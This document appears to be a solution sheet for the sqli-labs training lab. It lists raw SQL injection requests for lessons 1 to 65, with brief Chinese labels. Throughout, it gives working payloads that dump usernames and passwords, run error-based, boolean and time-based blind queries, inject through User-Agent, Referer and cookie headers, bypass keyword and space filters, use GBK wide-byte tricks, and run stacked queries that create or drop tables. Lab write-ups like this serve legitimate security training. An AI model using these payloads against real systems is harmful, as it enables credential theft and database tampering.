GET /Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
Less-2
request
1
GET /Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users --+
Less-3
request
1
GET /Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+
Less-4
request
1
GET /Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+
Less-5
request
1
GET /Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+
Less-6
request
1
GET /Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+
Less-7
request
1
GET /Less-7/?id=1')) and ascii(substr((select database()),1,1))=115 --+
Less-8
request
1
GET /Less-8/?id=1' and ascii(substr((select database()),1,1))=115 --+
Less-9
request
1
GET /Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+
Less-10
request
1
GET /Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+
Less-11
request
1 2 3 4
POST /Less-11/ Content-Type: application/x-www-form-urlencoded
uname=' or 1=1 --+&passwd=1&submit=Submit
Less-12
request
1 2 3 4
POST /Less-12/ Content-Type: application/x-www-form-urlencoded
uname=-1") union select (select group_concat(username) from users),(select group_concat(password) from users) --+&passwd=1&submit=Submit
Less-13
request
1 2 3 4
POST /Less-13/ Content-Type: application/x-www-form-urlencoded
uname=admin') and sleep(3) --+&passwd=1&submit=Submit
Less-14
request
1 2 3 4
POST /Less-14/ Content-Type: application/x-www-form-urlencoded
uname=admin" and sleep(3) --+&passwd=1&submit=Submit
Less-15
request
1 2 3 4
POST /Less-15/ Content-Type: application/x-www-form-urlencoded
uname=admin' and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit
Less-16
request
1 2 3 4
POST /Less-16/ Content-Type: application/x-www-form-urlencoded
uname=admin") and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit
Less-17
request
1 2 3 4
POST /Less-17/ Content-Type: application/x-www-form-urlencoded
uname=admin&passwd=1' and updatexml(1,concat(0x7e,database()),1) --+&submit=Submit
Less-18
User-Agent 头注入
request
1 2 3 4 5
POST /Less18/ Content-Type: application/x-www-form-urlencoded User-Agent: 1' or updatexml(1,concat(0x7e,database()),1) or '1
uname=admin&passwd=admin&submit=Submit
Less-19
request
1 2 3 4 5
POST /Less19/ Content-Type: application/x-www-form-urlencoded Referer: 1' or updatexml(1,concat(0x7e,database()),1) or '1
uname=admin&passwd=admin&submit=Submit
Less-20
request
1 2
GET /Less-20/index.php Cookie: uname=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+
Page-2 (Advanced Injections)
Less-21
request
1 2
GET /Less-21/index.php Cookie: uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpIw%3d%3d
Less-22
request
1 2
GET /Less-22/index.php Cookie: uname=LTEiIHVuaW9uIHNlbGVjdCAxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIHVzZXJzKSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2Vycykj
Less-23
request
1
GET /Less-23/?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),3 or '1'='1
Less-24
注册admin'#用户
登录admin'#用户
修改admin'#用户密码
退出登录admin'#用户
登录admin用户,密码为admin'#用户的新密码
—
Less-25
过滤 or/and 用 && ||
request
1
?id=-1' && 1=2 union select 1,2,3 and '1'='1
Less-25a
过滤空格 or/and
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1
Less-26
过滤空格、注释、or/and
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1
Less-26a
过滤 /*#– 空格
request
1
?id=-1'%0aunion%0aselect%0a1,2,3%0aand%0a'1'='1
Less-27
过滤 union select
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1
Less-27a
过滤大小写关键字
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1
Less-28
过滤 union select 注释
request
1
?id=-1' uNioN sElEcT 1,2,3 and '1'='1
Less-28a
多层过滤关键字
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1
Less-29
过滤空格,保留引号
request
1
?id=-1'%09union%09select%091,2,3%09and%09'1'='1
Less-30
数字型过滤空格
request
1
?id=-1%09union%09select%091,2,3
Less-31
双引号过滤空格
request
1
?id=-1"%09union%09select%091,2,3%09and%09"1"="1
Less-32
宽字节 GBK %df 绕过 addslashes
request
1
?id=-1%df' union select 1,2,group_concat(username,0x3a,password) from users --+
Less-33
宽字节 mysql_real_escape_string
request
1
?id=-1%df' union select 1,2,3 --+
Less-34
宽字节 POST 注入
request
1 2
uname 参数: %df' or 1=1 --+
Less-35
数字型无转义宽字节无影响
request
1
?id=-1 union select 1,2,3 --+
Less-36
单引号 mysql_real_escape_string 宽字节
request
1
?id=-1%df' union select 1,2,3 --+
Less-37
POST 宽字节注入
request
1 2
uname: %df' union select 1,2 --+
Page-3 (Stacked Injections)
Less-38
堆叠注入多语句
request
1
?id=1';select group_concat(username,0x3a,password) from users;--+
Less-39
数字型堆叠注入
request
1
?id=1;select group_concat(username,0x3a,password) from users;--+
Less-40
‘) 闭合堆叠注入
request
1
?id=1');select group_concat(username,0x3a,password) from users;--+
Less-41
无过滤数字堆叠
request
1
?id=1;create table hack like users;--+
Less-42
“) 堆叠注入
request
1
?id=1");select database();--+
Less-43
‘) 堆叠注入
request
1
?id=1');show tables;--+
Less-44
双引号堆叠
request
1
?id=1");select user();--+
Less-45
‘) 堆叠注入
request
1
?id=1');select group_concat(table_name) from information_schema.tables where table_schema=database();--+
Less-46
数字堆叠无过滤
request
1
?id=1;drop table if exists test;create table test(id int);--+
Less-47
单引号堆叠,过滤注释
request
1
?id=1';select database() and '1'='1
Less-48
过滤# – 堆叠注入
request
1
?id=1';select database() and '1'='1
Less-49
堆叠 + 空格过滤
request
1
?id=1';%09select%09database()%09and%09'1'='1
Less-50
数字堆叠空格过滤
request
1
?id=1;%09select%09database()
Less-51
POST 堆叠注入
request
1 2
uname: admin';select database();--+
Less-52
POST 数字堆叠
request
1 2
uname: 1;select group_concat(username,0x3a,password) from users;--+
Less-53
POST ‘) 堆叠
request
1 2
uname: admin');select database();--+
Page-4 (Challenges)
Less-54
随机闭合 + 过滤关键字盲注
request
1
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),1) and '1'='1
Less-55
随机 ‘) 闭合过滤
request
1
?id=1') and if(ascii(substr(database(),1,1))=115,sleep(2),1) and ('1'='1
Less-56
随机 “ 闭合过滤
request
1
?id=1" and if(ascii(substr(database(),1,1))=115,sleep(2),1) and "1"="1
Less-57
随机数字型过滤
request
1
?id=1 and if(ascii(substr(database(),1,1))=115,sleep(2),1)
Less-58
单引号无注释严格过滤
request
1
?id=-1' uNioN sElEcT 1,2,3 and '1'='1
Less-59
双引号无注释过滤
request
1
?id=-1" uNioN sElEcT 1,2,3 and "1"="1
Less-60
数字型无注释过滤
request
1
?id=-1 uNioN sElEcT 1,2,3
Less-61
POST 单引号随机过滤盲注
request
1 2
uname: admin' and if(length(database())=8,sleep(2),1) and '1'='1
Less-62
POST ‘) 闭合盲注
request
1 2
uname: admin') and if(length(database())=8,sleep(2),1) and ('1'='1
Less-63
POST “ 闭合盲注
request
1 2
uname: admin" and if(length(database())=8,sleep(2),1) and "1"="1
Less-64
POST 数字盲注
request
1 2
uname: 1 and if(length(database())=8,sleep(2),1
Less-65
POST “) 闭合过滤盲注
request
1 2
uname: admin") and if(length(database())=8,sleep(2),1) and ("1"="1